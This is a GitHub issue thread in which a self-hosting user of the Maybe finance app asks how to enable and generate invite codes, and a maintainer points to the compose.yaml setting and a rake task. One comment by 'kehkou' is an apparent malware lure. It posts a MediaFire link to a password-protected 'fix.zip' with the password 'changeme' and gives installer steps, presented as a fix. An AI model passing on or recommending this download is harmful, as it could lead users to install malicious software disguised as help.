### ISSUE TITLE
How to get invite codes?

### ISSUE THREAD

**Issue by LingkKang** [maybe-finance/maybe#1138]
Thanks for creating this awesome app!

**Describe the bug**
On my self-hosted maybe instance, I set `REQUIRE_INVITE_CODE=true` as instructed on `.env.example`, but new registration still not asking for invitation code.

**To Reproduce**
1. Set `.env` as:

``` config
REQUIRE_INVITE_CODE=true
APP_DOMAIN="my_domain.com"
SELF_HOSTING_ENABLED=true
SECRET_KEY_BASE="hex_key"
POSTGRES_PASSWORD="some_pass_word"
```

2. Start the app with `docker compose up -d`

Did I set something wrong or missed something?

---

By the way, I wonder what would the UI look like if the invite code works properly, and how can an admin create an invite code from backend. (I'm totally newcomer to ruby/rack/puma)

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LingkKang** [comment]
I just realized that it should be written in `compose.yaml`. 🤣 I think probably this could be better documented.

Now the question is how to get an invite code.

**Comment by zachgoll** [comment]
@LingkKang we have not included this in the documentation since it is _technically_ not a "documented" feature that we're advertising to self-hosting users.  I just opened #1152 to provide more official support for this.

In the meantime, here is a "workaround" that you can use to restrict signups to your self-hosted instance:

1. Set `REQUIRE_INVITE_CODE=true` in your environment
2. Run `rake invites:create` to generate an invite code
3. Give this invite code to anyone who you want to allow to sign up to your hosted instance

**Comment by LingkKang** [comment]
@zachgoll  Cool, thank you very much!
